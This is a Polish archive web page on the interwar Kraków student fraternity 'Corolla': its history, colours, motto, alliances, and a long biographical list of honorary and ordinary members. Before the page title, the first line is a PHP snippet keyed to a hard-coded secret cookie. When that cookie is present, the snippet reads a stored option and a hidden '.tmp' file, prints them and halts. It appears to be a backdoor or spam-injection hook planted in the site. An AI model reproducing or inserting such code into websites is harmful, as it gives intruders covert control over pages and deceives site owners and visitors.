if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Corolla

Dekiel Corolli - vide Poszukiwania. Nazwa:
Korporacja Studentów Szkół Akademickich “Corolla”, w 1938 r. Stowarzyszenie Ideowo Wychowawcze Corolla
Siedziba:
Kraków
Data powstania:
18 V 1923 r.
Barwy:
pomarańczowa – granatowa – biała
Dewiza:
„Pro Patria et Corolla” („Dla Ojczyzny i Korony”)

Rys historyczny

Herb Corolli, 1933 r.

Corolla powstala 18 V 1923 r. Została założona - podobnie jak K! Akropolia i K! Gnomia - w 1923 r. przez Mariana Schroedera oraz Łucjana Kleina z poznańskiej K! Lechia. Była korporacją o charakterze ziemiańskim i skupiała wyłącznie studentów pochodzenia szlacheckiego.

Prezydium Corolli, prawd. lata 30-te.

Dnia 15 I 1924 r. Corolla została przyjęta do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 15 I 1924 r.). W latach 1933-1936 znajdowała się poza strukturami Związku. Związek Filistrów powstał dnia 15 lutego 1927 r., a dnia 18 V 1928 r. odbyło się poświęcenie sztandaru Korporacji.

Przy Corolli kandydowała w Związku K! Vesalia.

Corollczycy, prawd. lata 30-te.

Corolla zawarła kartele: dnia 21 II 1927 r. z K! Regia (wypowiedziany przez Corollę dnia 29 VI 1928 r.), dnia 1 VI 1928 r. z K! Corona, w 1929 r. z K! Vesalia oraz w 1932 r. z K! Arcadia.

Tablica pamiątkowa Corolli, 1984 r.

W 1931 r. kuratorem Korporacji z ramienia uniwersyteckiego Senatu był prof. Edmund Załęski, a w 1938 r. prof. Józef Przyborowski. W 1931 r. siedziba Corolli znajdowała się przy ul. św. Filipa 21 (II piętro), a w 1938 r. w kamienicy przy ul. Karmelickiej 36 (I piętro).

Całkowita ustalona, choć niekompletna imienna liczba członków obejmuje 106 nazwisk, w tym 15 członków honorowych.

Dnia 17 października 1981 r. w kościele akademickim pw. św. Anny w Krakowie odsłonięta została tablica poświęcona zmarłym, poległym i pomordowanym członkom Corolli.

Lista członków

Poniższa, niekompletna lista członków Corolli obejmuje ponad sto nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Jan Artwiński, ojciec Józefa (Corolla), ziemianin z Łęk Górnych pow. Pilzno, Filister honorowy Corolli
 2. Tadeusz Bohdanowicz, ziemianin, Filister honorowy Corolli
 3. Stefan Ciszewski, (ok. 1890 - 11 grudnia 1950 w Krakowie) s. N. oraz Zofii z Brzezia-Marszałkowicz, ziemianin z Kazimierzy Wielkiej, Filister honorowy Corolli
 4. January Korytowski, ziemianin z Kopadłówek w pow. wilczyńskim, Filister honorowy Corolli
 5. Bronisław Kwiatkowski, dr praw, emerytowany naczelnik wydziału w Urzędzie Wojewódzkim w Krakowie, Filister honorowy Corolli
 6. Kazimierz Małecki, ziemianin z Roznoszyńc pow. Zbaraż, Filister honorowy Corolli
 7. Felicjan hr. Mieroszewski, (ok. 1880 - 30 czerwca 1931 w miejsc. Ropa w pow. gorlickim) s. Tadeusza i Marianny, ziemianin z Ropy, Filister honorowy Corolli
 8. Konstanty Murzynowski, (1 czerwca 1880 w Szczytnikach - 28 września 1949), ziemianin z Kalinowa pow. Błaszki, Filister honorowy Corolli, pochowany w miejsc. Cieszyno (?)
 9. Wacław Niemojewski, (26 sierpnia 1865 we Wrocławiu - 14 grudnia 1939 w Marchwaczu k. Kalisza), ziemianin z Marchwacz w pow. opatowskim, przewodniczący Tymczasowej Rady Stanu Królestwa Polskiego 1917, w II Rzeczypospolitej działacz monarchistyczny, m.in. od 1926 prezes Rady Naczelnej polskich monarchistów, w 1927 wycofał się z życia publicznego, Filister honorowy Corolli
 10. Kazimierz hr. Osiecimski-Czapski, (6 czerwca 1866 w Paryżu - 29 września 1942 w Krakowie) s. Hipolita i Matyldy z Hutten-Czapskich, emerytowany ppłk WP, Filister honorowy Corolli
 11. Józef Przyborowski, dr, docent UJ, Filister honorowy Corolli
 12. Franciszek Ksawery hr. Pusłowski, (16 czerwca 1875 w Sévres Ville d’Avray pod Paryżem - 8 lipca 1968 w Krakowie) s. Zygmunta i Marii z Moszyńskich, ziemianin, oficer WP oraz dyplomata 1918-24, m.in. sekretarz Ignacego Paderewskiego w czasie konferencji w Wersalu 1919, sekretarz Wojciecha Korfantego i adiutant gen. Stanisława Szeptyckiego w trakcie zabiegów o pozyskanie przez Polskę Górnego Śląska 1921, szef Kancelarii Wojskowej Prezydenta RP i zastępca jego Adiutanta Generalnego 1923, w 1923 przeniesiony do rezerwy za publiczną wypowiedź sugerującą udział zwolenników Marszałka Józefa Piłsudskiego w wywołaniu krwawych demonstracji w Krakowie w 1923, Filister honorowy Corolli, członek Komitetu Filologicznego Literatur Zachodnich PAU, wiceprezes i członek jury Towarzystwa Przyjaciół Sztuk Pięknych 1945-50, po wojnie tłumacz przysięgły oraz lektor języka francuskiego AG 1947-51 oraz PK, w 1953 przekazał swój pałac oraz kolekcję obrazów na Wawel oraz UJ
 13. Michał hr. Rostworowski, (27 sierpnia 1864 w Dreźnie - 24 marca 1940 w Gromnikach k. Tarnowa) s. Romana i Marii z d. Gloger, brat Karola Pawła (Arkonia), prof. prawa międzynarodowego i państwowego UJ 1903-30, rektor UJ 1925/26, sędzia Stałego Trybunału Sprawiedliwości Międzynarodowej 1931-40, Filister honorowy Corolli
 14. Adam Jordan Rozwadowski, (9 lipca 1876 w Dołpotowie w pow. Kałusz - 23 stycznia 1957 w Krakowie) s. Franciszka i Marii z d. Wiktor, ojciec Jana (Corolla), emerytowany płk WP, Filister honorowy Corolli
 15. Włodzimierz hr. Tyszkiewicz, (28 stycznia 1880 w Brodach - 1953 w Londynie) herbu Leliwa, s. Marcelego i Marii z Krąkowskich, oficer Cesarskiej i Królewskiej Armii, od 1918 w WP, płk dyplomowany kawalerii, szef sztabu 4 Dywizji Piechoty 1919, w kwietniu 1920 zwolniony na własną prośbę przeniesiony do rezerwy, w 1922 szef sztabu Dowództwa Okręgu Korpusu X w Przemyślu, od października 1922 dowódca 25 Pułku Ułanów Wielkopolskich w Prużanie, od 1925 dowódca 5 Samodzielnej Brygady Kawalerii, od października dowódca 10 Brygady Kawalerii, w 1927 przeniesiony w stan spoczynku, Filister honorowy Corolli

Członkowie rzeczywiści

 1. Aleksander Aksan, akt. 1938-39, po wojnie na emigracji w Wielkiej Brytanii
 2. Józef Artwiński, s. Jana (Corolla), student i absolwent WSH, w 1931 w Łękach Górnych pow. Pilzno
 3. Janusz Barthel de Weydenthal, akt. 1938-39, wiceprezes sem. zim. 1938/39, skarbnik Krakowskiego Koła Międzykorporacyjnego sem. zim. 1938/39
 4. Adam Bielański, (18 sierpnia 1904 - 5 kwietnia 1988) herbu Awdaniec, z Bielin w Sandomierskim, s. Antoniego Piotra i Marii z Jasieńskich, student prawa UJ, później student UP, członek Coroll, później Corony, prezes sem. zim. 1927/28, w czasie wojny w 9 Pułku Ułanów, adjutant wiceministra wojny gen. Głuchowskiego, ostatni dowódca 15 Pułu Ułanków, płk WP, po wojnie na emigracji w Wielkiej Brytanii, odznaczony m.in. Krzyżem Virtuti Militarii i Krzyżem Walecznych
 5. Władysław Bielański, (1911 - 15 marca 1982) brat Adama (Corolla), student i absolwent Wydziału Rolnego UJ, c. 1930/31, akt. 1930-31, absolwent Szkoły Podchorążych Artylerii we Włodzimierzu Wołyńskim, prof. Akademii Rolniczej w Krakowie
 6. Adam Bieliński, student Wydziału Rolnego UJ, po wojnie na emigracji w Wielkiej Brytanii
 7. Stanisław Jopek-Biliński, (1908-1982) student Wydziału Rolnego UJ, potem Wydział Rolniczy PL w Dublanach, akt. 1930-31
 8. Andrzej Bniński, student Wydziału Rolnego UJ, c. 1930/31, akt. 1930-31
 9. Roman Bniński, ( - wrzesień 1939) ze Szlaku, student Wydziału Rolnego UJ, c. 1930/31, akt. 1930-31, w wojnie obronnej 1939 w 8 Pułku Ułanów, poległ w walkach
 10. Włodzimierz Skarbek-Borowski, ( - 1973) z Minogi w Olkuskim, student i absolwent Wydziału Rolnego UJ, założyciel Corolli, po studiach administrował maj. Klucza Dębickiego z siedzibą w Nagawczynie (maj. Szwagra Edwarda Raczyńskiego), po wojnie dyrektor Instytutu Zootechnicznego, przed śmiercią miał się habilitować (?)
 11. Dezydery Chłapowski, (1913 - 1997 w Krakowie) student i absolwent prawa UJ, c. 1931, akt. 1931
 12. Mieczysław Dominik Czaykowski, (1908-1995) z Hańkowic k. Kołomyi, student prawa UJ, c. 1930/31, akt. 1930-31, skarbnik sem. zim. 1931/32, żołnierz PSZ na Zachodzie, po wojnie na emigracji w Wielkiej Brytanii, pracownik Radia Wolna Europa
 13. Jerzy Zygmunt Dąbrowski, (9 kwietnia 1908 w maj. Michałowice w pow. miechowskim - 1940 w Krakowie) z rodziny ziemiańskiej, s. Tadeusza i Jadwigi z Majewskich, brat Stanisława (Corolla), absolwent Gimnazjum im. H. Sienkiewicza w Krakowie, student i absolwent 1930 rolnictwa UJ, w 1931 w Michałowicach w pow. krakowskim, absolwent Szkoły Podchorążych Rezerwy Kawalerii w Grudziądzu 1932, w niewoli sowieckiej w Kozielsku, zamordowany przez NKWD
 14. Stanisław Dąbrowski, z rodziny ziemiańskiej, s. Tadeusza i Jadwigi z Majewskich, z Michałowic, brat Jerzego (Corolla), akt. 1938-39, sekretarz sem. zim. 1938/39
 15. Julian Dobrzański, akt. 1938-39
 16. Józef Drużbacki, student Wydziału Rolniczego UJ 1928-32, c. 1930/31, akt. 1930-31
 17. Stanisław Dyakowski, (29 kwietnia 1909 w Młodziejowicach - 6 kwietnia 1970 w Gliwicach) s. Przemysława, absolwent IV Gimnazjum im. H. Sienkiewicza w Krakowie, student i absolwent Wydziału Hutniczego 1929-35, c. 1930, akt. 1930-31, szef wielkich pieców w Hucie Bankowej w Dąbrowie Górniczej 1936-37, Hucie Hulczyński w Zawierciu, zastępca szefa wielkich pieców w Hucie Trzyniec 1938-39 oraz Hucie “Kościuszko” w Chorzowie 1945-47, kierownik działu wielkich pieców “Biprohut” w Gliwice
 18. H. Garczyński,
 19. Henryk Gawroński Rawicz, (1910 - 18 października 1996 w Krakowie) student i absolwent UJ, akt. 1930-33, c. 1930, prezes, wiceprezes, sekretarz i olderman, Inspektorat “Maria” AK, pracownik Instytutu Farmakologii PAN
 20. Franciszek Gąsiecki, ( - przed 1981) student i absolwent Wydziału Rolnego UJ, w 1931 w Krakowie, po wojnie na emigracji w Niemczech
 21. Jan Głowiński,
 22. Jan Gołowin, akt. 1938-39, olderman sem. zim. 1938/39
 23. Stanisław Gostkowski, ( - wrzesień 1977) herbu Gozdawa, z Tomic k. Wadowic, student i absolwent Wydziału Rolnego UJ, akt. 1928-29, prezes Krakowskiego Koła Międzykorporacyjnego sem. zim. 1928/29, w 1931 w Krakowie, dr ichtiologii, żołnierz wojny obronnej 1939, w niewoli niemieckiej, po wojnie osiadł w RPA
 24. Lech Górski, z Baranowicz, student Wydziału Rolnego UJ, akt. 1930-31, wiceprezes sem. zim. 1930/31
 25. Franciszek Grotowski, student i absolwent Wydziału Rolnego UJ, w 1931 w Jaćmierzu pow. Zarszyn
 26. Jerzy Gumiński, (1907 - po 1981) brat Aleksandra i Jana (obaj Arkonia), student i absolwent WSH, stryjeczny, akt. 1928-31, prezes sem. zim. 1929/30, współorganizator odsłnięcia tablicy pamiątkowej Corolli w Kościele pw. św. Anny w Krakowie 1981
 27. Henryk Hackbeil, c. 1932
 28. Jerzy Janesch, (?)
 29. Stanisław Jasieński, ( - 1999) po wojnie na emigracji w Wielkiej Brytanii
 30. Kazimierz Jeleński, (maj 1903 w Wilnie - 16 marca 1943 w Auschwitz) herbu własnego (Wręby), s. Józefa Zygmunta (Arkonia) i Heleny z d. Mohl, łącznik przy dowódcy Samoobrony Wileńskiej gen. Wejtko 1918, uczestnik obrony Warszawy 1920, student i absolwent Wydziału Rolnego UJ, założyciel Corolli, akt. 1923-25, kilkukrotny prezes, m.in. pierwszy prezes 1923 oraz sem. zim. 1924/25, przewodniczący Koła Filistrów 1931, ukończył Szkołę Podchorążych Rezerwy Kawalerii w Grudziądzu 1929/30, przydzielony do 4 Pułku Ułanów, ppor. rez., po studiach gospodarował w rodzinnym maj. Glinciszki na Wileńszczyźnie, prezes Związku Ziemian w Wilnie, w wojnie obronnej 1939 w 110 Pułu Kawalerii, ranny, w konspiracji w ZWZ/AK, dowódca 2 kompanii ZWZ Mszana Dolna 1940-42, zweryfikowany do stopnia rotmistrza, aresztowany przez Gestapo w Rabce, więzień obozu koncentracyjnego w Auschwitz, gdzie zginął, odznaczony Srebrnym Krzyżem Zasługi z Mieczami
 31. Kazimierz Karczewski, mgr filozofii, w 1931 we Lwowie
 32. Klemens Dunin-Kęplicz, ( - 1975 w Warszawie) prawnik, dziennikarz
 33. Adam Nowina-Konopka, (1905 - 1978 w Londynie) z maj. Modlnica k. Krakowa, student Wydziału Rolnego UJ, c. ok. 1932/33
 34. Jacek Konopka,
 35. Ludwik Nowina-Konopka, (1918 - ) z maj. Modlnica k. Krakowa, student Wydziału Rolnego UJ, c. ok. 1938, akt. 1938-39
 36. Mikołaj Nowina-Konopka, (1911-1962) student prawa UJ, c. ok. 1933/34, zginął tragicznie w katastrofie kolejowej
 37. Wojciech Nowina-Konopka,
 38. Andrzej Korytowski, herbu Mora, z Wielkopolski, student i absolwent prawa UJ, akt. 1928/29, wiceprezes Krakowskiego Koła Międzykorporacyjnego sem. zim. 1928/29, w 1931 w Kopydłówku w pow. Wilczyńskim, adwokat
 39. Michał Krasicki, (28 stycznia 1910 w Zborowie - 28 kwietnia 1987) s. Michała i Antoniny z Ochockich, bratanek Jana Kazimierza (Regia), kuzyn Jana Kantego i Kazimierza (obaj Regia), student prawa UJ, c. 1930, pochowany na Cmentarzu Rakowickim w Krakowie
 40. Marian Krasiński, student fil. UJ, c. 1930/31, akt. 1930-31
 41. Mieczysław Ledóchowski, ( - 1970) s. Mieczysława, uczeń Konwiktu Ojców Jezuitów w Chyrowie, student i absolwent Wydziału Rolnego UJ, założyciel Corolli, po studiach administrował maj. Fundacji Ossolińskich w Przybyszu k. Mielca, w wojnie obronnej 1939 w 19 Pułku Ułanów, w niewoli niemieckiej, po wojnie nauczyciel fizyki i matematyki w szkole w Warszawie, pochowany na Cmentarzu w Lipnicy
 42. Alfred Łubieński, (20 lipca 1902 - 12 września 1944) herbu Pomian, z Zassowa, s. Tadeusza i Marii z d. Chościak-Popiel, brat Konstantego (Corolla), ochotnik w Pułku Ułanów Krechowickich WP 1919/20, odznaczony Krzyżem Walecznych, student i absolwent Wydziału Rolnego UJ, założyciel Corolli, po studiach odbył praktykę w Szwajcarii, a następnie osiadł w maj. rodzinnym Zassowa, prowadził hodowlę róż i skomponował park wokół swej rezydencji, pchor. rez., w 1939 przedostał się do Francji, walczył w kampanii francuskiej 1940, ranny w niewoli niemieckiej, zwolniony, por. AK pseud. “Iwo”, w czasie wojny dowodził partyzantką w lasach dębickich, tam poległ, odznaczony Krzyżem Virtuti Militarii
 43. Konstanty Łubieński, (1910-1977) herbu Pomian, z Zassowa, s. Tadeusza i Marii z d. Chościak-Popiel, brat Alfreda (Corolla), student i absolwent prawa UJ, c. 1930/31, akt. 1930-33, sekretarz sem. zim. 1931/32, prezes 1933, w wojnie obronnej 1939 w 2 Pułku Strzelców Konnych z Hrubieszowa, w konspiracji komendant okręgu mieleckiego AK, publicysta katolicki, polityk, poseł Znaku na Sejm PRL, członek Rady Państwa, pochowany w Warszawie, odznaczony m.in. Virtuti Militarii
 44. Aleksander Saryusz-Małecki, ( - 1939) z Roznoszyniec pow. Zbaraż, student i absolwent ASP, założyciel Corolli, akt. 1923-25, kilkukrotny olderman, m.in. sem. zim. 1924/25, w 1931 w Roznoszyńsach w pow. Zbaraż, olimpijczyk w szpadzie, oficer rez., poległ w wojnie obronnej 1939
 45. Tadeusz Maryański, (?)
 46. Jan Stefan Meysztowicz, (1910 - 27 lutego 1997 w Warszawie) s. Oskara (Arkonia) i Florentyny z Kęszyckich, student i absolwent prawa UJ, c. 1930/31, akt. 1930-32, gospodarz prezes sem. zim. 1931/32, działacz Myśli Mocarstwowej, absolwent UJ, mgr praw, pisarz
 47. Tadeusz Mięsowicz, student prawa UJ, akt. 1930-32, sekretarz sem. zim. 1930/31, wiceprezes sem. let. 1930/31, olderman prezes sem. zim. 1931/32
 48. Zygmunt Mięsowicz, student i absolwent prawa UJ, skarbnik sem. let. 1930/31, adwokat
 49. Juliusz Mikułowski-Pomorski, ( - 2004) herbu Rawicz, z Malic na Sandomierszczyźnie, brat Tadeusza (Corolla), student i absolwent Wydziału Rolnego UJ, założyciel Corolli, absolwent Szkoły Podchorążych Artylerii we Włodzimierzu Wołyńskim 1928/29, po studiach gospodarował w Jeziorkach w Wielkopolsce, w 1931 w Ołykach na Wołyniu, uczestnik wojny obronnej 1939, w niewoli niemieckiej, po wojnie na emigracji w Kanadzie
 50. Tadeusz Mikułowski-Pomorski, (5 lutego 1911 - 9 grudnia 1983 w Nowym Targu) brat Juliusza (Corolla), student i absolwent prawa UJ, c. 1930/31, akt. 1930-31
 51. Michał Miłkowski, student Wydziału Rolniczego UJ, akt. 1930-31, olderman sem. zim. i sem. let. 1930/31
 52. Czesław Murzynowski, (8 grudnia 1907 w miejsc. Kalinowa - 1998) s. Konstantego i Łucji z Kosińskich, student Wydziału Rolno-Leśnego UP, po wojnie na emigracji we Francji
 53. Józef Nałęcz, (17 lipca 1901 - 18 kwietnia 1932) z miejsc. Kikół na Kujawach, s. Władysława i Franciszki z Korwin-Krasińskich, student i absolwent Wydziału Rolnego UJ, założyciel Corolli, zmarł na gruźlicę, pochowany na cmentarzu w Kikole
 54. Wincenty Omieciński, student Wydziału Rolnego UJ, akt. 1930-31, skarbnik sem. zim. 1930/31, olderman 1931
 55. Jerzy Pietraszewski, ( - przed 1981) student i absolwent Wydziału Rolnego UJ, w 1931 w Drzazgowej Woli w pow. Baby
 56. Konstanty Plater, student i absolwent WSH, c. 1930/31, akt. 1930-31
 57. Stanisław Jastrzębiec-Popławski, ( - 22 sierpnia 1944) z Promnika k. Kielc, student i absolwent Wydziału Rolnego UJ, założyciel Corolli, dr nauk rolniczych, ziemianin, właściel maj. Promnik, rozstrzelany przez Gestapo po rewizji furmanki, w której przewoził broń dla AK
 58. Jerzy Rayski, (1917-1994), akt. 1938-39, skarbnik sem. zim. 1938/39, fizyk-teoretyk, prof. UJ
 59. Wilhelm Romer, ( - sierpień 1977 w Wiedniu) herbu Jelita, z Bieździedzy k. Kołaczyc w pow. jasielskim, uczeń Konwiktu Ojców Jezuitów w Chyrowie, student i absolwent Wydziału Rolnego UJ, założyciel Corolli, w 1931 w Bieździedzy, po II wojnie światowej na emigracji w Londynie, a następnie w Wiedniu
 60. Jan Jordan Rozwadowski, (31 października 1910 w Złoczowie - 25 lipca 1990 w Ferno w Kanadzie) s. Adama (Corolla) i Anny z Trzecieskich, student Wydziału Rolnego UJ, akt. 1930-32, prezes sem. zim. i sem. let. 1930/31, prezes sem. zim. 1931/32, po wojnie na emigracji w Republice Południowej Afryki, odznaczony m.in. Krzyżem Virtuti Militarii
 61. Kazimierz Sadowski, (1909 - ) student i absolwent Wydziału Rolnego UJ, c. 1928, akt. 1928-32, gospodarz sem. zim. 1930/31, sekretarz sem. let. 1930/31, wiceprezes sem. zim. 1931/32, po wojnie pracownik NIK
 62. Leon Salmonowicz, student Wydziału Rolniczego PL Lwów w Dublanach, akt. 1930-31
 63. Jerzy Sczaniecki, (23 sierpnia 1904 w Kwiatonowicach w pow. gorlickim - 22 grudnia 1983 w Krakowie) s. Stefana Wiktora i (…) z d. Kaleńska, absolwent Gimnazjum im. Adama Mickiewicza w Gorlicach 1923, student i absolwent Wydziału Rolnego UJ 1923-27, założyciel Corolli, w 1931 w Kocmyrzowie, oficer 6 Dyonu Artylerii Konnej, uczestnik wojny obronnej 1939, uciekł z niewoli sowieckiej, wykupiony z niewoli niemieckiej, po wojnie urzędnik w Państwowym Monopolu Spirytusowym, pochowany na Cmentarzu Rakowickim w Krakowie
 64. Ludwik Bruno Sędzimir, (4 lutego 1904 w Krakowie - 1940 w Katyniu) s. Mieczysława i Jadwigi z Zielonków, absolwent VII Państwowego Gimnazjum Realnego w Krakowie, student i absolwent Wydziału Rolnego UJ, założyciel Corolli, w 1931 w Krakowie, absolwent Szkoły Podchorążych Rezerwy Kawalerii w Grudziądzu 1928, ppor. rez. kawalerii, w 1939 przydzielony do 6 Pułku Strzelców Konnych, w wojnie obronnej 1939 w 2 Pułku Szwoleżerów w Oddziale Zapasowym Pomorskiej Brygady Kawalerii, w niewoli sowieckiej, zamordowany przez NKWD
 65. Andrzej Siedlecki, student prawa UJ, c. 1930/31, akt. 1930-31
 66. Siemiński,
 67. Ludwik Skrzyński,
 68. N. Pereświt-Sołtan, c. 1933
 69. Stanisław Sołtan, (1915-1992), akt. 1938-39
 70. Antoni Stadnicki, brat Jana (Corolla), z Rożnowa nad Dunajcem, s. Józefa Jana i Joanny ze Stadnickich, student i absolwent Wydziału Rolnego UJ, zaginął w czasie wojny bez wieści
 71. Jan hr Stadnicki, (1 marca 1911 w Radawcu k. Lublina - ) s. Józefa Jana i Joanny ze Stadnickich, brat Antoniego (Corolla), z Rożnowa n. Dunajcem, student i absolwent prawa UJ
 72. Jerzy hr. Stadnicki, c. 1932, akt. 1933-1938
 73. Domnik Starzeński, z Ostrowczan k. Kamieńca Podolskiego, student i absolwent Wydziału Rolnego UJ, założyciel Corolli, akt. 1923-25, sekretarz sem. zim. 1924/25, wystąpił z Corolli, po studiach pracował w cukrownictwie w Wielkopolsce, później (?) zamieszkał w Warszawie
 74. Jan Andrzej Stella-Sawicki, (26 stycznia 1912 we Lwowie - 14 listopada 1984 w Krakowie) s. Izydora i Jadwigi z d. Więckowska, prawd. Gimnazjum św. Jacka w Krakowie, student i absolwent prawa UJ, po studiach pracownik Przemysłu Exportu Węglowego, w wojnie obronnej 1939 dowódca III plutonu w 2 szwadronie w 5 Pułku Strzelców Konnych, m.in. w walkach po Woźnikami, Szczekocinami, Biłgorajem i Tomaszowem Mazowieckim, odznaczony Krzyżem Walecznych, więzień niemieckich oflagów, po wyzwoleniu pracownik UNRRA, po wojnie radca prawny AGH oraz Przesiębiorstwa Budownictwa Mieszkaniowego ZETBEEM w Krakowie, główny organizator odsłnięcia tablicy pamiątkowej Corolli w Kościele pw. św. Anny w Krakowie 1981, pochowany na Cmentarzu Salwatorskim w Krakowie
 75. Włodzimierz Stobiecki, student rolnictwa Wydziału Rolno-Leśnego UP, akt. 1930-31
 76. Albert Sumiński, ( - wrzesień 1977 w Stanach Zjednoczonych) herbu Leszczyc, s. Niny z Oczosalskich, student i absolwent Wydziału Rolnego UJ, a następnie student i absolwent prawa UL, po studiach właściel oddzieczonego maj. Podkamień k. Brodów na Wołyniu, w wojnie obronnej 1939 konny artylerzysta, żołnierz PSZ na Zachodzie, mjr konnej artylerii, odznaczony m.in. Krzyżem Virtuti Militarii i Krzyżem Walecznych oraz angielskim Military Cross, po wojnie w Kaliforni
 77. Piotr Sumiński, (?), po wojnie na emigracji w Stanach Zjednoczonych
 78. Stanisław Stefan Tołłoczko, (26 września 1905 w miejsc. Kazimierza Wielka w woj. kieleckim - 3 lutego 1986 we Wrocławiu) herbu Pogóg, z maj. Wierdomicz k. Świsłocza w Grodzieńskim, s. Juliana Witolda i Emilii z hr. Badenich, student i absolwent Wydziału Rolnego UJ, założyciel Corolli, po studiach gospodarował w maj. Wierdocze, w wojnie obronnej 1939 oficer 3 Pułu Strzelców Konnych Wołowyskich, odznaczony Krzyżem Walecznych, więzień niemieckiego obozu jenieckiego, po wojnie we Wrocławiu
 79. Krzysztof hr. Tyszkiewicz, (8 maja 1911 w Krakowie - 2 stycznia 1977 w Berkhamstead) s. Józefa i Ireny z Gołąbek-Jezierskich, student Wydziału Rolnego UJ, c. 1930/31, akt. 1930-31, po wojnie na emigracji w Wielkiej Brytanii
 80. Stanisław hr. Tyszkiewicz, (9 października 1907 w meijsc. Połąga [Polaga] w pow. Groblin - 1980) herbu Leliwa, s. Feliksa i Antoniny z Łąckich, w 1931 w Paryżu
 81. Józef Wodziński, ( - 1982/83) s. Gabriela (Arkonia), akt. 1938-39, prezes sem. zim. 1938/39, ostatni prezes Corolli
 82. Andrzej Wójcicki,
 83. Ludwik Wykowski, student Wydziału Rolnego UJ, akt. 1930-31, gospodarz sem. let. 1930/31
 84. Paweł Wysocki,
 85. Witold Wysgota (Wyskota, Wyssogota) Zakrzewski, (15 maja 1902 - 1945) herbu Wyssogota, z Ciążenia k. Słupcy, s. Mieczysława i Izabelli z Dąmbskich, założyciel Corolli
 86. Witold Zakrzewski, (17 grudnia 1918 w Krakowie - 16 października 1992 w Krakowie) herbu Pomian, s. Tadeusza i Marii Jadwigi z d. Baranieckiej, absolwent V Gimnazjum im. Augusta Witkowskiego w Krakowie, student prawa UJ i WSH w Krakowie, c. 1938, w wojnie obronnej 1939 w 5 Dywizji Artylerii, odznaczony Srebrnym Krzyżem Virtuti Militari, pracownik Rady Głównej Opiekuńczej w Krakowie 1941-45, student tajnego Wydziału Prawa UW, mgr prawa 1945, dr praw UJ 1946, jako stypendysta Ministerstwa Oświaty uzyskał Diploma in Administrative Law and Practice Uniwersytetu w Edynburgu 1948, od 1948 pracownik Katedry Prawa Państwowego, docent 1956, prof. nadzw. 1964 i prof. zw. 1974, dyrektor Instytutu Nauk Politycznych i kierownik Katedry Prawa Państwowego, działacz społeczny, bezpartyjny radny Miejskiej, a później Wojewódzkiej Rady Narodowej, bezpartyjny posł na Sejm VIII i IX kadencji 1980-89, w tym m.in. przewodniczącego Komisji Spraw Ustawodawczych, wieloletni członek Rady Legislacyjnej, pochowany w grobie rodzinnym na Cmentarzu Rakowickim
 87. Maciej Załęski, (6 lutego 1904 w maj. rodzinym Bugaj - ) herbu Prus-Ślubicz, s. Kazimierza i Teresy z Karskich, bratanek (?) Edmunda (Arkonia, Welecja), student i absolwent prawa UJ, założyciel Corolli, akt. 1923-25, skarbnik sem. zim. 1924/25, dyplomata, w 1931 w Legation polonaise w Moskwie, podobno po wojnie na emigracji w Wenezueli
 88. Józef Zoll, (22 listopada 1904 - 1970 w Poznaniu) s. Fryderyka (juniora), współzałożyciel Corolli, student i absolwent Wydziału Rolnego UJ, akt. 1923-25, wiceprezes sem. zim. 1924/25, w 1931 w Oporowie k. Wronek, ppor. rez. art. ze starszeństwem od 1 stycznia 1932, po ukończeniu podchorążówki prawd. odbywał praktykę w 7 Dywizjonie Artylerii Konnej, przypisany do 5 Dywizjonu Artylerii Kawalerii w Krakowie, w wojnie obronnej 1939 w 14 Pułku Arytlerii Lekkiej, po wojnie urzędnik w administracji Poznania

  Źródła dodatkowe: uzupełnienia Paweł Janicki, www.7dak.pl

 89. Franciszek Żaba, (1906 - 11 lutego 1982, Kraków) herbu Kościesza, ze Zbylitowskiej Góry k. Tarnowa, s. Romana i Anny z Oczosalskich, student i absolwent Wydziału Rolnego UJ, prezes sem. let. 1928/29, po studiach administrował maj. własnym Zbylitowska Góra oraz administrował sąsiednim maj. Świerczków, w czasie wojny w konspiracji, więziony po wojnie przez UB, prowadził zakład doświadczalny w Górce Narodwej, na emeryturze wyjechał do Brazylii, gdzie prowadził gospodarstwo swego przedwojennego sąsiada ks. Romana Sanguszki z Guminsk, wrócił do Polski i zmarł w Krakowie
 90. Roman Żukowski, student i absolwent Wydziału Rolnego UJ, po wojnie na emigracji w Austrii
 91. Rafał Żuławski, (?) (1912-1989) s. Zygmunta

Pieczęć Corolli, 1931 r.

Listę członków opracowano na podstawie:

1) “Corolla” Korporacja Studentów Szkół Akademickich, (w:) Biuletyn Krakowskiego Koła Międzykorporacyjnego. Za semestr letni roku akademickiego 1930-1931, Kraków 1931, s. 14 i n.,
2) Corolla Stowarzyszenie Ideowo Wychowawcze, (w:) Biuletyn Krakowskiego Koła Międzykorporacyjnego. Za semestr letni roku akademickiego 1938-1939, Kraków 1938, s. 13 i n.,
3) materiałów archiwalnych z Archiwum Korporacyjnego,
4) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Corolla.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 3 IX 2013 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Studentów Szkół Akademickich “Corolla” w Krakowie, (na:) www.archiwumkorporacyjne.pl, stan 3 IX 2013 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }